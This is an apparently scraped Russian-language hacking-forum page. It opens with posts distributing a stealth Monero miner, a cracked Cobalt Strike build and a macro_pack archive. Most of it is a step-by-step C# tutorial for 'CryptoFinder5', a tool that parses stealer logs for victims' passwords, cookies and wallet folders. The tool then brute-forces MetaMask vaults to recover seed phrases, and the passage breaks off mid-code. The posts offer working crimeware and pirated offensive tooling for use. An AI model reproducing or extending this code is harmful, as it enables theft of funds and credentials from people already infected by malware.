![send.exploit.in](/proxy.php?image=https%3A%2F%2Fsend.exploit.in%2Fsend- fb.358d4b57.jpg&hash=824ffe54bac782fbc1c2b7f04639d4b7&return_error=1)
](https://send.exploit.in/download/6d504224246ca08b/#SmFnaHe1YkbdBx4VA2yiwQ)
Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.
send.exploit.in
Hidden content for authorized users.
anonfiles.com
SilentXMRMiner v1.4.4 RU
.NET - написан на C #, требует .NET Framework 4.5.
XMRIG 6.12
Cuda 11.0
Все ссылки на сайт автора удалены.
Все резервные каналы для загрузки библиотек и майнера вы прописываете сами
Может майнить следующие криптовалюты:
Monero,2ACoin,ArQmA,Haven, Blockcloud,Conceal,Dero
Electronero,
ElectroneroXP,Graft,Kevacoin,Kryptokrona,Masari,NinjaCoin,Ravencoin,Safex,Sumokoin,Talleo,Turtlecoin,Uplexa
Wownero
Поддержка следующих алгоритмов:
cn/zls,cn/double,cn/2,cn/xao,cn/rto,cn-heavy/tube,cn-heavy/0,cn/1,cn-lite/1,
cn-lite/0,cn/0,rx/0,argon2/chukwa,rx/arq,cn-heavy/xhv,cn/ccx,astrobwt,cn/fast,
cn/rwz,rx/keva,cn-pico,cn/half,argon2/ninja,kawpow,rx/sfx,cn/r,cn-
pico/tlo,argon2/chukwav2,
cn/upx2,rx/wow.
Возможности:
Spoiler: Скриншоты
Я выпускаю исправленную версию Cobalstrike 4.4, скомпилированную из исходников. Он исправляет "ошибку консоли", выход из вкладок (учетные данные, нажатия клавиш и снимки экрана), а также отсутствующие файлы VPN.
Этот релиз является функциональным, и его будет более чем достаточно для тестирования инструмента. У него есть некоторые ограничения, чтобы избежать злоупотреблений со стороны детей-сценаристов, но после некоторых исследований его можно исправить или обойти.
С моей стороны это будет последний релиз, но я буду открыт для обзоров. Спасибо всем, кто меня поддерживает
Code:Copy to clipboard
482402e0f7712e95fd2366afee9ce029f6b2a08a cobaltstrike.jar
[](http://https: //ibb.co/X7YwnRn)
You must have at least 5 reaction(s) to view the content.
Запароленный архив с macropack pro, пароля к сожалению нет, возможно кто-то
сбрутит.
Буду благодарен если кто то скинут в пм без пароля.
P.S В известном скам тг канале продают паблик с гита скомпиленную в бинарь
Hidden content for authorized users.
](https://anonfiles.com/V841R9O4u8/macro_pack_pro_7z)
anonfiles.com
Источник:XSS.is
Автор Kain1029
Всем привет, дорогие друзья. Меня слишком давно не было на форуме и к сожалению не успел к конкурсу. Сегодня в нашей программе чекер крипты в логах. Я переработал имеющиеся алгоритмы в CFinder3 и CFinder4 , благополучно забросил чат и положил на все это дело болт.
Немного пред истории. Чисто случайно я наткнулся на одну свежую реализацию чекера крипто кошелька. Я не считаю себя ультраспциалистом, но у меня почти сразу же потекли глаза. Не было толковых названий переменных , весь код зависел друг от друга, никакого вам SOLID DRY KISS, про расширяемость я молчу. Я вновь загорелся идеей написать свой крипточекер, подзаработать немного реакций, а если повезет деньжат на новый сервер и крутую разработку, но сейчас не об этом.
Здесь будет очень(очень) много кода, но я старался расписать его понятнее, так что, если понял поставь лайк - поддержи опен сорс разработку.
Spoiler: Дисклеймер
Все, что я написал, является лишь продуктом моего воображения. Такого не существует, и мы живем в мире симулякра. Повторяйте это только на свой страх и риск. Я не несу ответственности за ваши действия.
Spoiler: День 1. Подготовка и требования
Я придерживаюсь правила - "Семь раз отмерь и один раз пошли это все в жопу", поэтому будем много дебажить и править по месту. Конечно же шучу. Стараемся делать высококачественное приложение, потому что так надо.
Что нам понадобиться для создания крипточекера:
1. Прямые руки(хотя бы одна)
2. IDE. Я предпочитаю Rider , но вы делайте хоть в ворде
3. Голова на плечах и способность ей думать
4. Горячий чай
5. .NET Core 7
6. Опыт работы с C#
Что мы хотим получить в итоге?
По сути я хочу получить библиотеки, которые я могу использовать независимо
друг от друга ,а в случае необходимости объединить их в один крипточекер, на
текущем этапе мне достаточно парсер паролей и кошельков, но что если я буду
расширять приложения и мне понадобятся доп функции? Исходя из этого мне
необходима модульность. Чтобы ее достичь , достаточно просто разделить все
составляющие на отдельно работающие библиотеки - модули. Если вы можете
использовать один модуль независимо от другого, значит вы делаете все
правильно.
Разделяй и властвуй © Александр Македонский
Spoiler: День 2. Настройка
Создаем пустой Solution с именем CryptoFinder5. нем создаем 4 папки, это будет
условное разделение на функциональности. Вы можете назвать как хотите, но я
назвал так:
1. Functions - здесь будут храниться проекты с расширениями, какие то мелкие
функции и так далее.
2. Presentations - тут не придраться. Здесь храниться общая оболочка. Здесь
создаются только исполняемые проекты(Консоль, WPF , ASP.NET и т.д.)
3. Scrapers - здесь находятся парсеры информации с лога. Изначально они были
в Function папке , но когда их появилось аж 3, я решил их закинуть отдельно.
Так гораздо удобнее.
4. WalletDecryptors - здесь хранятся проекты для расшифровки криптокошельков
Зачем нужно это разделение, если можно запихнуть все в один солюшен?
Не знаю как вам, а я испытываю эстетическое удовольствие когда все на своих
местах, к тому же глазу удобнее и быстрее можно разобраться, где что лежит. Вы
можете делать и в одной папке, но я считаю, что правильно даже визуально
разделять проекты на составляющие.
Spoiler: День 3. Методы расширения и парсеры
Начнем с самого простого - методы расширения. Я проект уже дописал и знаю,
какие конкретно нужны.
В папке Function создаем проект CrpytoFinder5.Extentions , в этом проекте
будут лежать только утилиты и методы расширения и больше ничего.
В проекте создаем 2 папки:
Utils - сюда будем класть утилитки
Extentions - здесь будут храниться методы расширения
Начнем с Extention. В данной папке создам класс LinqExtention.cs и вставляете в него следующий код.
Spoiler: LinqExtention.cs
Эти 2 метода расширения очень медленные, но порой очень удобные. Они выполняют фильтрацию по определенному условию.
C#:Copy to clipboard
public static class LinqExtentions
{
public static IEnumerable<TSource> WhereIf<TSource>(
this IEnumerable<TSource> source,
bool condition,
Func<TSource, bool> predicate)
{
return condition ? source.Where(predicate) : source;
}
public static IEnumerable<TSource> WhereIfElse<TSource>(
this IEnumerable<TSource> source,
bool condition,
Func<TSource, bool> predicateIf,
Func<TSource, bool> predicateElse)
{
return condition ? source.Where(predicateIf) : source.Where(predicateElse);
}
}
Spoiler: ListExtentions.cs
Эти 2 метода работают с массивом. Первый проверяет является ли массив пустым,
второй проверяет имеются ли элементы в массиве.
Просто, но удобно. Можно было бы не выносить их в отдельный класс, а
использовать по месту, но в таком случае, если добавится еще какое то условие
для ВСЕХ массивов, придется переделывать его везде.
C#:Copy to clipboard
public static class ListExtentions
{
public static bool IsEmpty<T>(this IEnumerable<T>? enumerable)
=> enumerable?.Any() != true;
public static bool IsNotEmpty<T>(this IEnumerable<T>? enumerable)
=> !IsEmpty(enumerable);
}
Папка Utils нам понадобится немного позже. Я написал интересную реализацию и
думаю вам тоже зайдет.
-----------------------------------------------------
Собиратель паролей
-----------------------------------------------------
Первый на очереди и самый нужный это собиратель паролей.
С ходу я придумал 3 возможных реализации сбора паролей под каждый случай, они
собирают разный по объему массив данных, но и жрут память по разному
1. Собираем пароли только из файла Passwords.txt поля "Password:" .
Преимущества в том, что это самый низкозатратный метод. Он собирает только
самое нужное, но имеет недостаток, если лог изменится и поле будет называться
не Password: , а PWD: , работать оно уже не будет
2. Собираем пароли из файла Passwords.txt все поля. Собирает все поля,
соответственно уже не важно как называется поле, пароль мы получим в любом
случае. Исключения само собой есть, но это скорее индивидуальный случай, чем
постоянная практика.
3. Собираем пароли из всех полей файлов Passwords.txt и Autofill. Собирает
слишком много мусора, но это имеет самые высокие шансы найти подходящий
пароль.
В папке Scrapers создаем проект CryptoFinder5.PasswordScraper , ввиду того,
что он имеет целых 3 вариации работы и какие то настройки, сразу же создаем в
этом проекте 2 папки Option и BasePasswordScraper
Ввиду того, что мы делаем модульную систему мы должны сделать ее настраиваемую
изнутри, но главное не преусердствовать
В папку Option закидываем enum PasswordScraperOption
Spoiler: PasswordScraperOption.cs
Это будем перечислять режимы работы.
C#:Copy to clipboard
public enum PasswordScraperOption
{
LOW,
MEDIUM,
HIGH
}
Далее в папку BasePasswordScraper закидываем файл PasswordScraperBase.cs Это будет базовый класс для всех типов собирателей паролей.
Spoiler: PasswordScraperBase.cs
C#:Copy to clipboard
public abstract class PasswordScraperBase
{
// Поставил на всякий случай, есть вероятность, что пригодится для внушней идентификации
// типа парсера
protected abstract PasswordScraperOption Option { get; set; }
// Указывает по какому признакому искать файл с возможными паролями
// В данному случае путь до файла(но и получается файл) должен содержить "assword"
protected virtual Func<string, bool> PasswordFileSearchPredicate { get; set; } = (string file)
=> file.Contains("assword", StringComparison.OrdinalIgnoreCase);
// Предикат для фильтрации строк в файле
// По умолчанию будет брать строку , которая содержит "assword"
protected virtual Func<string, bool> PasswordLinesPredicate { get; set; } = (string line)
=> line.Contains("assword", StringComparison.OrdinalIgnoreCase);
// Можно было и не делать, но решил вынести отдельно
// Предикат, который разделяет строку на составляющую не зависимо
// от кол-во пробелов и берет последнее слово
protected virtual Func<string, string?> PasswordScrapeInLinePredicate { get; set; } = (string line)
=> line.Split(new char[] { ' ','\t' }, StringSplitOptions.RemoveEmptyEntries).LastOrDefault();
// Сам метод является абстрактным, а это значит, что мы обязаны реализовать его
public abstract Task<List<string>> GetPasswordsAsync(string directory);
}
Отлично,а теперь приступаем к реализации наших 3х способов. Создаем 3 файла:
PasswordScraperLowPower.cs - для первого способа
PasswordScraperMediumPower.cs - для первого способа
PasswordScraperHighPower.cs - для первого способа
Spoiler: PasswordScraperLowPower.cs
Реализация вполне стандартная. Ищем файлы, читаем в лист, возвращаем.
C#:Copy to clipboard
/// <summary>
/// Получает только пароли из файла Password поля Password
/// </summary>
public class PasswordScraperLowPower : PasswordScraperBase
{
protected override PasswordScraperOption Option { get; set; } = PasswordScraperOption.LOW;
public override async Task<List<string>> GetPasswordsAsync(string directory)
{
if (!Directory.Exists(directory))
throw new DirectoryNotFoundException("Данный путь не является папкой");
var allFiles = Directory.GetFiles(directory, "*", SearchOption.AllDirectories);
var passwordFiles = allFiles
.Where(PasswordFileSearchPredicate)
.ToArray();
var passwordLines = new List<string?>();
foreach (var passwordFile in passwordFiles)
{
var passwords = await File.ReadAllLinesAsync(passwordFile);
passwordLines.AddRange(passwords);
}
return passwordLines
.Where(PasswordLinesPredicate)
.Select(PasswordScrapeInLinePredicate)
.Distinct()
.Where(x => !string.IsNullOrWhiteSpace(x))
.ToList(); // Специально для XSS.IS By Kain
}
}
Spoiler: PasswordScaperMediumPower.cs
Максимально простой класс. Здесь мы просто переопределяем предикаты базового класса на новую фильтрацию и получаем нужный результат
C#:Copy to clipboard
/// <summary>
/// Получает пароли из файлов Password все строчки
/// </summary>
public class PasswordScaperMediumPower : PasswordScraperLowPower
{
protected override PasswordScraperOption Option { get; set; } = PasswordScraperOption.MEDIUM;
protected override Func<string, bool> PasswordLinesPredicate { get; set; } = (string line) => true; //<- вообще не фильтруем, а говорим "Да, на устраивает эта строчка"
}
Spoiler: PasswordScraperHighPower.cs
Здесь переопределяем 2 предиката: на поиск файла и на поиск строки.
Code:Copy to clipboard
/// <summary>
/// Получает пароли из Passwords.txt и Autofill.txt все строчки
/// </summary>
public class PasswordScraperHighPower : PasswordScraperLowPower
{
protected override PasswordScraperOption Option { get; set; } = PasswordScraperOption.HIGH;
protected override Func<string, bool> PasswordLinesPredicate { get; set; } = (string line) => true;
protected override Func<string, bool> PasswordFileSearchPredicate { get; set; } = (string file)
=> file.Contains("assword", StringComparison.OrdinalIgnoreCase) ||
file.Contains("utofill", StringComparison.OrdinalIgnoreCase);
}
Со скрапером паролей мы закончили.Приступаем дальше.
-----------------------------------------------------
Собиратель кошельков
-----------------------------------------------------
Создаем еще один проект в папке Scrapper CryptoFinder5.WalletScraper
Здесь все точно так же 3 папки BaseWalletScraper, Enums, Models
В папку BaseWalletScrapers закидываем файл
Spoiler: WalletScraperBase.cs
Здесь содержится абстрактный метод для получения кошельков , который
необходимо реализовать везде и метод GetWalletTypeByString
По сути он работает как: предаете строковое представление кошелька (например
Metamask) и он возвращает Enum. Все просто.
C#:Copy to clipboard
public abstract class WalletScraperBase
{
public abstract Task<List<Wallet>?> GetWalletsList(string directory);
protected virtual WalletType GetWalletTypeByString(string walletStringName)
{
var walletTypeNames = Enum.GetValues(typeof(WalletType));
foreach (var walletType in walletTypeNames)
{
var stringWalletType = walletType.ToString();
if (walletStringName.Contains(stringWalletType, StringComparison.OrdinalIgnoreCase))
{
return (WalletType)walletType;
}
}
return WalletType.Unknown;
}
}
В папку Enums закидываете файл WalletType.cs он представляет собой перечисление типов кошельков
Spoiler: WalletType.cs
C#:Copy to clipboard
public enum WalletType
{
Unknown,
Metamask,
Ronin,
Brave,
Electrum,
Exodus,
Coinbase,
Armory,
Bitcoin,
Raven
}
В папку Models закидываем Wallet.cs , он будет представлять выходное значение.
Т.к. это у нас не брут, а просто парсер, то наша задача просто достать
информацию о кошельке для дальнейшей обработки
Spoiler: Wallet.cs
C#:Copy to clipboard
public class Wallet
{
/// <summary>Путь до папки с кошельком</summary>
public string WalletDirectory { get; set; }
/// <summary>Тип кошелька</summary>
public WalletType WalletType { get; set; }
}
Далее в папке проекта создаем WalletScraperClassic.cs . Он будет является реализацией абстрактного базового класса
Spoiler: WalletScraperClassic.cs
Ничего лишнего. Получаем все ПАПКИ в логе, ищем те, которые оканчиваются на
Wallet или Wallets
и обрабатываем их, после чего возвращаем массивом
Code:Copy to clipboard
public class WalletScraperClassic : WalletScraperBase
{
public override async Task<List<Wallet>?> GetWalletsList(string directory)
{
var allFiles = Directory.GetDirectories(directory, "*", SearchOption.AllDirectories);
var fileWithWalletPrefix = allFiles
.FirstOrDefault(x =>
x.EndsWith("allets", StringComparison.OrdinalIgnoreCase) ||
x.EndsWith("allet", StringComparison.OrdinalIgnoreCase));
if (fileWithWalletPrefix == null)
{
return null;
}
var walletDirectories = Directory.GetDirectories(fileWithWalletPrefix, "*", SearchOption.TopDirectoryOnly);
var wallets = new List<Wallet>();
if (walletDirectories.IsEmpty())
{
return wallets;
}
foreach (var walletDirectory in walletDirectories)
{
var stringNameWallet = walletDirectory.Split('\\').LastOrDefault() ?? string.Empty;
if (stringNameWallet != null)
{
wallets.Add(new Wallet()
{
WalletDirectory = walletDirectory,
WalletType = base.GetWalletTypeByString(walletDirectory)
});
}
}
return wallets;
}
}
-----------------------------------------------------
Собиратель куки
-----------------------------------------------------
В качестве бонуса решил приложить свою реализацию парсера куки.
Его можно и не делать, но для моего будущего софта оно пригодится.
Создаем в Scrapers CryptoFinder5.CookieScraper
2 папки: Models, BaseCookieScraper
Models -> Cookie.cs
Spoiler: Cookie.cs
C#:Copy to clipboard
public class Cookie
{
/// <summary>Имя</summary>
public string? Name { get; set; }
/// <summary>Значени</summary>
public string? Value { get; set; }
/// <summary>Домен</summary>
public string Domain { get; set; }
/// <summary>Путь</summary>
public string? Path { get; set; }
/// <summary>Http</summary>
public bool HttpOnly { get; set; }
/// <summary>Защищено</summary>
public bool Secure { get; set; }
/// <summary>Время</summary>
public int ExpTime { get; set; }
}
BaseCookieScraper -> CookieScraperBase.cs
Spoiler: CookieScraperBase.cs
C#:Copy to clipboard
public abstract class CookieScraperBase
{
protected virtual Func<string, bool> CookieFileSearchPredicate { get; set; } = (string file)
=> file.Contains("cookie", StringComparison.OrdinalIgnoreCase);
protected virtual Func<string, string, bool> CookieFileSearchTargetPredicate { get; set; } = (string file, string cookieName)
=> file.Contains(cookieName, StringComparison.OrdinalIgnoreCase);
public abstract Task<List<Cookie>> GetCookieList(string directory, string cookieName = null);
}
Spoiler: CookieScraperClassicMode.cs
Получаем все файлы, путь до которых содержит cookie (без учета регистра), читаем , материализуем, возвращаем
Code:Copy to clipboard
public class CookieScraperClassicMode : CookieScraperBase
{
public override async Task<List<Cookie>> GetCookieList(string directory, string cookieBrowser = null)
{
var files = Directory.GetFiles(directory, "*", SearchOption.AllDirectories);
var cookieFiles = files
.Where(CookieFileSearchPredicate)
.WhereIf(!string.IsNullOrWhiteSpace(cookieBrowser),
file => CookieFileSearchTargetPredicate(file, cookieBrowser))
.ToArray();
var cookieList = new List<Cookie>();
foreach (var cookieFile in cookieFiles)
{
var cookieFileLines = await File.ReadAllLinesAsync(cookieFile);
var cookieFileLinesConverted = cookieFileLines
.Select(line => line.Split(new char[] { ' ', '\t' }, StringSplitOptions.RemoveEmptyEntries))
.Select(linePath => new Cookie()
{
Domain = linePath[0],
HttpOnly = bool.TryParse(linePath.ElementAtOrDefault(1), out bool httpOnly) && httpOnly,
Path = linePath.ElementAtOrDefault(2),
Secure = bool.TryParse(linePath.ElementAtOrDefault(3), out bool secure) && secure,
ExpTime = int.TryParse(linePath.ElementAtOrDefault(4), out int expTime) ? expTime : 0,
Name = linePath.ElementAtOrDefault(5),
Value = linePath.ElementAtOrDefault(6)
})
.ToArray();
cookieList.AddRange(cookieFileLinesConverted);
}
return cookieList;
}
}
Вот и сделали простейшие парсеры.**
Почему создаем отдельные проекты, если можно создать 1 проект и в ней 3
парсера?**
Я создаю максимально независимую систему, чтобы в случае чего я мог отдельно
использовать каждый из ее модулей по отдельности
Можно ли добавить еще несколько парсеров, например из Information.txt?
Да, для этого создаете еще один проект и делаете по аналогии.
Что еще можно доделать?
Я бы сделать парсинг не только паролей, но всех полей, создал модель и
заполнил ее. В будущем это может пригодится
Если вы сделали, все правильно, то у вас будет примерно такая картина
Spoiler: День 4. Декриптор метамаска и адрес генератор
Когда я писал данную приложуху я начинал именно с этой библиотеки, но мы идет
от простого к сложному, а это самое сложное, долгое и занимает слишком много
времени.
Из всех кошельков я решил выбрать метамаск. Почему? Он претерпел изменения,
старые софты уже не работают. В этом блоке я попытаюсь рассказать что
изменилось и как исправить.
Сразу по изменениям. Я зашел на оф сайт восстановления мнемоники и перечитал
js код. добавился новый объект - itteration со значением 60000 (но бывает и
старые 10000), так же немного изменилась структура JSON,но это даже не
проблема, а временная трудность.
В папке WalletDecryptors создаем проект CryptoFinde5.BaseDecryptor, теперь
базовым будет являться проект, потому что я решил, отдельные реализации
кошельков создавать отдельным проектом
2 папки: Models , Cryptography в первой содержатся модели, а во второй
некоторые методы расшифровки.
Models -> Decrypted.cs
Spoiler: Decrypted.cs
Данная модель представляет собой ни что иное как кошелек, вернее его расшифрованный вариант
C#:Copy to clipboard
public class Decrypted
{
public string? File { get; set; }
/// <summary>
/// Монемоническая фраза/ приватный ключ
/// </summary>
public string? Mnemonic { get; set; }
/// <summary>
/// Пароль
/// </summary>
public string? Password { get; set; }
/// <summary>
/// Строка HashCat
/// </summary>
public string? Hashcat { get; set; }
/// <summary>
/// Список адресов
/// </summary>
public IEnumerable<Address> Addresses { get; set; }
}
public class Address
{
/// <summary>
/// Адрес
/// </summary>
public string? Hash { get; set; }
/// <summary>
/// Данные о балансах адреса
/// </summary>
public List<Data>? Data { get; set; }
}
public class Data
{
/// <summary>
/// Имя токена
/// </summary>
public string? Token { get; set; }
/// <summary>
/// Баланс в WEI
/// </summary>
public ulong Balance { get; set; } = 0;
/// <summary>
/// Цена за единицу токена
/// </summary>
public double? Price { get; set; }
/// <summary>
/// Цена в $
/// </summary>
public double? Sum { get; set; }
}
Cryptograpy -> PBKDF2.cs
Spoiler: PBKDF2.cs
Объяснять слишком долго, можно просто поверить , что это надо
Code:Copy to clipboard
public class PBKDF2
{
public static byte[] DeriveKey(
byte[] password,
byte[] salt,
int iterationCount,
int keyBitLength,
HMAC prf)
{
prf.Key = password;
Ensure.MaxValue((long)keyBitLength, (long)uint.MaxValue,
"PBKDF2 expect derived key size to be not more that (2^32-1) bits, but was requested {0} bits.",
(object)keyBitLength);
int num1 = prf.HashSize / 8;
int num2;
int length = (int)Math.Ceiling((double)(num2 = keyBitLength / 8) / (double)num1);
int num3 = (length - 1) * num1;
int num4 = num2 - num3;
byte[][] numArray = new byte[length][];
for (int index = 0; index < length; ++index)
numArray[index] = PBKDF2.F(salt, iterationCount, index + 1, prf);
numArray[length - 1] = Arrays.LeftmostBits(numArray[length - 1], num4 * 8);
return Arrays.Concat(numArray);
}
private static byte[] F(byte[] salt, int iterationCount, int blockIndex, HMAC prf)
{
byte[] hash = prf.ComputeHash(Arrays.Concat(salt, Arrays.IntToBytes(blockIndex)));
byte[] left = hash;
for (int index = 2; index <= iterationCount; ++index)
{
hash = prf.ComputeHash(hash);
left = Arrays.Xor(left, hash);
}
return left;
}
private static class Arrays
{
public static byte[] Concat(params byte[][] arrays)
{
byte[] dst =
new byte[((IEnumerable<byte[]>)arrays).Sum<byte[]>((Func<byte[], int>)(a => a == null ? 0 : a.Length))];
int dstOffset = 0;
foreach (byte[] array in arrays)
{
if (array != null)
{
Buffer.BlockCopy((Array)array, 0, (Array)dst, dstOffset, array.Length);
dstOffset += array.Length;
}
}
return dst;
}
public static byte[] Xor(byte[] left, byte[] right)
{
Ensure.SameSize(left, right,
"Arrays.Xor(byte[], byte[]) expects both arrays to be same legnth, but was given {0} and {1}",
(object)left.Length, (object)right.Length);
byte[] numArray = new byte[left.Length];
for (int index = 0; index < left.Length; ++index)
numArray[index] = (byte)((uint)left[index] ^ (uint)right[index]);
return numArray;
}
public static byte[] IntToBytes(int value)
{
uint num = (uint)value;
return !BitConverter.IsLittleEndian
? new byte[4]
{
(byte)(num & (uint)byte.MaxValue),
(byte)(num >> 8 & (uint)byte.MaxValue),
(byte)(num >> 16 & (uint)byte.MaxValue),
(byte)(num >> 24 & (uint)byte.MaxValue)
}
: new byte[4]
{
(byte)(num >> 24 & (uint)byte.MaxValue),
(byte)(num >> 16 & (uint)byte.MaxValue),
(byte)(num >> 8 & (uint)byte.MaxValue),
(byte)(num & (uint)byte.MaxValue)
};
}
public static byte[] LeftmostBits(byte[] data, int lengthBits)
{
Ensure.Divisible(lengthBits, 8, "LeftmostBits() expects length in bits divisible by 8, but was given {0}",
(object)lengthBits);
int count = lengthBits / 8;
byte[] dst = new byte[count];
Buffer.BlockCopy((Array)data, 0, (Array)dst, 0, count);
return dst;
}
}
private static class Ensure
{
public static void Divisible(int arg, int divisor, string msg, params object[] args)
{
if (arg % divisor != 0)
throw new ArgumentException(string.Format(msg, args));
}
public static void MaxValue(long arg, long max, string msg, params object[] args)
{
if (arg > max)
throw new ArgumentException(string.Format(msg, args));
}
public static void SameSize(byte[] left, byte[] right, string msg, params object[] args)
{
if (left.Length != right.Length)
throw new ArgumentException(string.Format(msg, args));
}
}
}
Spoiler: BaseDecryptor.cs
Все по классике
C#:Copy to clipboard
public abstract class BaseDecryptor
{
public abstract Task<List<Decrypted>> DecryptWallet(string walletDirectory, IEnumerable<string> passwords);
}
Отлично. Базовые проект готов. Он будет описывать реализацию и иметь общие для всех кошельков свойства, ведь у каждого кошелька, есть приватный ключ / мнемоническая фраза , а значит ее можно без проблем вынести в общее
А теперь самое сладкое. Создаем CryptoFinder5.Metamask я думаю тут ничего
объяснять не надо.
иерархия папок такая:
Decryptors
--DecryptCPU.cs <- расшифровка на процессоре
--DecryptGPU.cs <- расшифровка на видеокарте с помощью HashCat
--BaseDecrypt
----DecryptBase.cs
Extractors
--RegexExtractor.cs <- Поиск Data IV Salt с помощью регулярных выражений
--ParseExtractor.cs <- Поиск Data IV Salt с помощью перебора строки после
vault (об этом ниже, очень крутой способ)
--ComboExtractor.cs <- Пробует поиск регулярками, если не находит пробует
через парсинг
--BaseExractor
----ExtractorBase.cs
Models
--Decode.cs <- расшифрованные данные (мнемоника и пароль)
--Vault.cs <- Содержит данные из vault
Options
--MetamaskOptions.cs <- Просто класс опций, для передачи в качестве
параметра
--DecryptMode.cs <- Способ расшифровки (он содержится в MetamaskOptions)
--ParseMode.cs <- Способ получения vault
Metamask.cs <- конкретный класс реализации расшифровки кошелька
Код достаточно понятный, поэтому комментировать я его не буду, если хотите можете почитать
Spoiler: ТЫК
Spoiler: DecryptBase.cs
C#:Copy to clipboard
public abstract class DecryptBase
{
public abstract Task<Decode?> Decrypt(Vault vault, IEnumerable<string> passwords);
}
Spoiler: DecryptCPU.cs
C#:Copy to clipboard
public class DecryptCPU : DecryptBase
{
private readonly GcmBlockCipher _cipher = new(new AesEngine());
private readonly ParallelOptions _parallelOptions = new() { MaxDegreeOfParallelism = 100 };
public override async Task<Decode?> Decrypt(Vault vault, IEnumerable<string> passwords)
{
var vaultBytesTuple = vault.ToBytesTuple();
passwords = passwords
.Where(x => x.Length > 7)
.ToList();
// Сюда будем записывать рзультаты
bool isBruted = false;
string brutedResult = String.Empty;
string successPassword = string.Empty;
// Запускаем поиск в паралели
Parallel.ForEach(passwords, _parallelOptions, (password, state) =>
{
if (isBruted) return;
try
{
byte[] key = PBKDF2.DeriveKey(Encoding.UTF8.GetBytes(password), vaultBytesTuple.Salt, vault.KeyMetaData.Params.Itterrations, 256, HMAC.Create("HMACSHA256"));
AeadParameters parameters = new AeadParameters(new KeyParameter(key), 128, vaultBytesTuple.Iv, null);
_cipher.Init(false, parameters);
byte[] plainBytes = new byte[_cipher.GetOutputSize(vaultBytesTuple.Data.Length)];
int retLen = _cipher.ProcessBytes(vaultBytesTuple.Data, 0, vaultBytesTuple.Data.Length, plainBytes, 0);
_cipher.DoFinal(plainBytes, retLen);
// Если решилось верно т.е. не выбило ошибку - записывам результаты
isBruted = true;
brutedResult = Encoding.UTF8.GetString(plainBytes);
successPassword = password;
state.Stop();
}
catch { }
});
if (string.IsNullOrWhiteSpace(brutedResult))
return null;
var mnemonicStartIndex = brutedResult.IndexOf("{\"mnemonic", StringComparison.OrdinalIgnoreCase);
var mnemonicSubstring = brutedResult.Substring(mnemonicStartIndex);
var repairedJson = JsonUtils.RepairJson(mnemonicSubstring);
string? mnemonic = null;
try
{
mnemonic = JsonSerializer.Deserialize<MnemonicString>(repairedJson)?.Mnemonic;
}
catch
{
var converted = JsonSerializer.Deserialize<MnemonicBytes>(repairedJson)?.Mnemonic
.SelectMany(BitConverter.GetBytes)
.Where(x => x != 0)
.ToArray();
mnemonic = Encoding.UTF8.GetString(converted ?? new byte[]{ });
}
return new Decode()
{
Mnemonic = mnemonic ?? "",
Password = successPassword
};
}
/// <summary>
/// Класс если из дешифровки возвращается массив байтов
/// </summary>
private class MnemonicBytes
{
[JsonPropertyName("mnemonic")]
public int[] Mnemonic { get; set; }
}
/// <summary>
/// Класс если из дешифровки возвращается строка
/// </summary>
private class MnemonicString
{
[JsonPropertyName("mnemonic")]
public string Mnemonic { get; set; }
}
}
Spoiler: ExtractorBase.cs
C#:Copy to clipboard
public abstract class ExtractorBase
{
protected bool IsNewFormat { get; set; }
public abstract Task<Vault?> ExtractData(string walletFile);
}
Spoiler: ComboExtractor.cs
C#:Copy to clipboard
public class ComboExtractor : ExtractorBase
{
public override async Task<Vault?> ExtractData(string walletFile)
=> await new RegexExtractor().ExtractData(walletFile) ??
await new ParseExtractor().ExtractData(walletFile);
}
Spoiler: ParseExtractor.cs
C#:Copy to clipboard
internal class ParseExtractor : ExtractorBase
{
public override async Task<Vault?> ExtractData(string textInFile)
{
var regexVault = Regex.Match(textInFile, "\"vault\"(.*)").Groups[1].Value;
if (regexVault.Contains("iterations"))
{
IsNewFormat = true;
}
var validJson = JsonUtils.RepairJson(regexVault); // <- Об этом чуть позже
var deserializedVault = JsonSerializer.Deserialize<Vault>(validJson);
if (deserializedVault != null)
deserializedVault.IsNewFormat = base.IsNewFormat;
return deserializedVault;
}
}
Spoiler: RegexExtractor.cs
C#:Copy to clipboard
internal class RegexExtractor : ExtractorBase
{
/// <summary>
/// Константы ргулдярных вырежний
/// </summary>
private const string dataRegex = @"\\""data\\"":\\""([\+\/-9A-Za-z]*=*)";
private const string ivRegex = @",\\""iv\\"":\\""([\+\/-9A-Za-z]{10,40}=*)";
private const string saltRegex = @",\\""salt\\"":\\""([A-Za-z0-9+\/]{10,100}=*)\\""";
private const string itterationsRegex = @"{\\""iterations\\"":([0-9]+)}";
/// <summary>
/// Получить зашифрованное сообщение
/// </summary>
/// <param name="vaultText">Текст зашифрованного сообщения внутри *.log</param>
/// <returns></returns>
public override async Task<Vault?> ExtractData(string vaultText)
{
var dataValue = Regex.Match(vaultText, dataRegex).Groups[1].Value;
var ivValue = Regex.Match(vaultText, ivRegex).Groups[1].Value;
var saltValue = Regex.Match(vaultText, saltRegex).Groups[1].Value;
if (string.IsNullOrWhiteSpace(dataValue) ||
string.IsNullOrWhiteSpace(ivValue) ||
string.IsNullOrWhiteSpace(saltValue))
{
return null;
}
bool isNewFormat = false;
// Если iteration не найдено, то это старый формат
var itterationsMatch = Regex.Match(vaultText, itterationsRegex).Groups[1].Value;
if (!string.IsNullOrWhiteSpace(itterationsMatch))
{
isNewFormat = true;
}
var itterationValue = Int32.TryParse(itterationsMatch, out int result) ? result : 10000;
return new Vault()
{
Data = dataValue,
Salt = saltValue,
IV = ivValue,
IsNewFormat = isNewFormat,
KeyMetaData = new KeyMetaData()
{
Algoritm = "PBKDF2",
Params = new Params()
{
Itterrations = itterationValue
}
}
};
}
}
Spoiler: Decode.cs
C#:Copy to clipboard
public class Decode
{
public string? Mnemonic { get; set; }
public string? Password { get; set; }
}
Spoiler: Vault.cs
C#:Copy to clipboard
public class Vault
{
[JsonPropertyName("data")]
public string Data { get; set; }
[JsonPropertyName("iv")]
public string IV { get; set; }
[JsonPropertyName("salt")]
public string Salt { get; set; }
[JsonPropertyName("keyMetadata")]
public KeyMetaData KeyMetaData { get; set; } = new();
[JsonIgnore]
public bool IsNewFormat { get; set; } = true;
public string ToHashcat()
{
return IsNewFormat
? $"$metamask${KeyMetaData.Params.Itterrations}${Salt}${IV}${Data}"
: $"$metamask${Salt}${IV}${Data}";
}
public bool IsEmpty()
{
if (string.IsNullOrWhiteSpace(Data) ||
string.IsNullOrWhiteSpace(IV) ||
string.IsNullOrWhiteSpace(Salt))
{
return true;
}
return false;
}
public (byte[] Salt, byte[] Iv, byte[] Data) ToBytesTuple()
{
return (
Convert.FromBase64String(Salt ?? ""),
